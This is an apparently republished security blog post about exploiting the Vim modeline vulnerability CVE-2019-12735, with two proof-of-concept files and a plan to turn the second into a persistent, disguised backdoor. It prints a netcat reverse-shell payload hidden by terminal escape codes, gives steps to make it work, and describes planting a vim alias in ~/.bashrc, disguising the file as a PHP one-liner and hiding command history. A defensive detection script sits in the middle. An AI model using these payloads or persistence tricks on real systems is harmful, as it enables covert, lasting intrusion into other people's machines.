Building a VIM macro backdoor on the Vim vulnerability CVE-2019-12735

2025-01-16 update. From: SLTechnology News&Howtos (shulou), Network Security


Shulou (Shulou.com) 05/31 report

This article walks through a VIM macro backdoor built on the Vim vulnerability CVE-2019-12735: reproducing the two public PoCs, and then turning the second one into a persistent, disguised backdoor.

0x00 Introduction

As a vim user of many years, I was a little alarmed when I learned a couple of days ago that Vim had an RCE vulnerability, so I spent some time on how to exploit it. Being a script kiddie, I will not explain the root cause of the vulnerability in this article; all I care about is how to use it. For an explanation of the cause, see the original author's GitHub repository: the original author GitHub link.

0x01 Reproducing the vulnerability

First, how to reproduce the vulnerability. In one sentence: a modeline can set 'foldexpr' to an arbitrary expression, and `:source!` run from that expression through assert_fails() was not blocked by the sandbox, so `:source! %` replays the bytes of the file itself as Normal-mode keystrokes. Two conditions must hold:

1. The Vim version must be affected. Most versions in use at the time were: the default vim on the Ubuntu image I recently opened on GCP, roughly 8.0, is affected. (The fix shipped in Vim 8.1.1365 and Neovim 0.3.6.)

2. The modeline option must be enabled, which is critical. It was not enabled by default on my GCP instance, which greatly reduces the impact of this vulnerability. I am not sure whether older versions or some derivative builds enable it by default. (Vim's built-in default is `modeline` on, except when running as root; Debian-based distributions turn it off in their default configuration, while Neovim leaves it on.)

Reproducing poc1:

1. Add `set modeline` to ~/.vimrc to make sure the option is on.

2. Write the original author's first poc into a file exactly as follows and save it:

```
:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="
```

3. Open the file with vim. If the version is affected, it prints the output of `uname -a`; if not, it is just ordinary text.

Reproducing poc2:

First, a look at the poc2 the original author published on GitHub (shown here in the escaped form of the author's README, with `\xNN` hex escapes and doubled backslashes; the copy in this post had lost part of that escaping):

```
\x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 127.0.0.1 9999 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n
```

If you are only testing, you do not need this poc; it is meant to be closer to real-world use. I expect some people will succeed with poc1 but never with poc2, because several things in it have to be changed first (to be precise, it cannot be copied and pasted as-is):

1. The hex escapes such as `\x1b` must become the actual bytes (0x1b is ESC, 0x16 is Ctrl-V). Pasting the escape text does not work; convert every hex escape in the poc to its byte with a hex editor.

2. Backslashes: the original poc carries extra backslashes that escape quotes and backslashes for display, so remove the extra `\` in front of each escaped character (`\'` becomes `'`, `\\` becomes `\`).

3. If your editor does not turn the final `\n` into a newline, replace it with a real Enter.

After modifying the poc as above, start a nc listener on the test machine with `nc -lvp 9999`, then open poc2 in vim and nc receives the reverse shell. (`-e` needs a netcat that supports it, such as traditional netcat or ncat; the OpenBSD variant shipped by many distributions does not.)

0x02 Rebuilding poc2 and adding the macro backdoor

First, why add a macro backdoor at all. The problem with poc2 is that once vim has opened the document, it no longer carries the malicious code and becomes a normal document. We could get persistence by downloading a Trojan after the first connection, but that is outside the scope here. My idea is a permanent backdoor that yields a reverse shell every time the document is opened, without relying on an external Trojan. Poc2 adds a lot of code to disguise the file as a normal one, so that even when you open it you do not notice the malicious code, whereas with poc1 the code execution is obvious. The disguise has several characteristics:

In the affected version, neither opening the file with vim nor with cat shows the inserted malicious code.

cat -v does show the malicious code.

Different versions of cat may display it somewhat differently, but the malicious code stays invisible.
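The cat versus cat -v behaviour above is also a detection opportunity. The following is an added example, not from the original post: a small scanner that flags a file whose modeline window (the first and last five lines, which is where Vim looks) contains a 'foldexpr' reaching a command sink, and that carries the ESC and Ctrl-V bytes poc2 relies on. The regexes and finding names are this example's own; the sample line at the top is constructed to mirror poc1.

```python
"""Flag files carrying the CVE-2019-12735 PoC pattern.

Added example, not part of the original post.  Two independent signals:
  * a Vim modeline whose fold expression reaches a command sink
    (assert_fails(), source!, system(), execute(), libcall);
  * raw ESC (0x1b) / Ctrl-V (0x16) bytes, which cat hides and cat -v shows.
"""
import re

# Vim honours modelines only in the first and last 'modelines' (default 5)
# lines, introduced by "vi:", "vim:" or "ex:" at line start or after whitespace.
MODELINE_RE = re.compile(rb"(?:^|\s)(?:vim?|ex):", re.IGNORECASE)
# 'fde'/'foldexpr' whose value calls into command execution; the PoCs write
# "source\!" with a backslash, hence the optional escape before "!".
SINK_RE = re.compile(
    rb"\b(?:fde|foldexpr)\s*=.*?(?:assert_fails|source\\?!|system\(|execute\(|libcall)",
    re.IGNORECASE,
)
ESC = 0x1B      # terminal escape: lets the payload overwrite itself on screen
CTRL_V = 0x16   # literal-next in Vim's command line, used to embed ESC there

# Constructed sample mirroring the first PoC (no terminal camouflage).
SAMPLE_POC1 = (
    b':!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\\!\\ \\%"):fdl=0:fdt="\n'
)


def scan(data: bytes, modelines: int = 5) -> list[str]:
    """Return the distinct findings for `data`, sorted; [] means nothing seen."""
    findings = set()
    lines = data.splitlines()  # bytes.splitlines splits on \n, \r, \r\n only
    for line in lines[:modelines] + lines[-modelines:]:
        if MODELINE_RE.search(line):
            findings.add("modeline")
            if SINK_RE.search(line):
                findings.add("foldexpr-command-sink")
    if ESC in data:
        findings.add("terminal-escapes")   # invisible to cat, visible to cat -v
    if CTRL_V in data:
        findings.add("ctrl-v-literal")
    return sorted(findings)


def scan_file(path: str, modelines: int = 5) -> list[str]:
    """Scan a file on disk; binary mode so no decoding can strip the control bytes."""
    with open(path, "rb") as f:
        return scan(f.read(), modelines)


if __name__ == "__main__":
    import sys
    for p in sys.argv[1:]:
        print(p, scan_file(p) or "clean")
```

A benign `# vim: set ts=4 sw=4:` line reports only "modeline", so the "foldexpr-command-sink" and "terminal-escapes" findings are the ones worth alerting on; a modeline outside the first or last five lines is ignored, exactly as Vim ignores it.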

To keep the disguise intact and still get a persistent backdoor, the only approach I could think of was vim macros.

The basic idea is as follows:

First, we want the code to run every time vim opens a file. Can we make vim run a macro every time it opens a file? Yes, as follows:

1. Record the macro in the vim window with `q{register}` (lowercase q; uppercase Q enters Ex mode). Press `q` again to stop recording.

2. Write `alias vim="vim -c '@{register}'"` and `shopt -s expand_aliases` into ~/.bashrc, so that the alias replaces vim and the macro runs by default on whatever file is opened. (expand_aliases is already on in interactive bash; the shopt line only matters for non-interactive shells.)

3. So as soon as the administrator logs into a shell again, whatever file he opens with vim will run the commands we recorded in the macro.

Next we need to add the macro-recording keys at the right place in poc2. The `\x1b` bytes in poc2 are ESC, the key that switches vim back to Normal mode, so we can start recording into register y by inserting `qy` after an ESC and before the command to execute, and stop recording by inserting `q` at a suitable point after the command has run. After many attempts I ended up with the following exp: a basic VIM macro sample

There are still several problems to fix in the above poc:

1. Every execution inserts the alias into .bashrc again, so one vim after another piles up line after line, which is very bad.

2. It is not disguised as normal file content.

For the first problem, the fix is to run the two commands separately and have the macro record only the first one (the reverse shell), while the second one (the alias insertion) runs only once. It sounds easy but it is not: the attempts hit a lot of problems, and because I am not good at this it took a long time. The second problem turned out to be far from as simple as I expected: I thought inserting text into the blank space would do, but the commands in the original poc affect that text, so writing arbitrary text there is still somewhat delicate. Here is the case in which both problems are finally solved and the file is disguised as a PHP one-liner: a vim macro backdoor disguised as a php Trojan horse.

PS: finally, the executed commands remain in vim's command history (`:history`); this can be masked by inserting some junk vim commands.

That is how a VIM macro backdoor can be built on the Vim vulnerability CVE-2019-12735. Hopefully you have picked up some knowledge or skills from it.
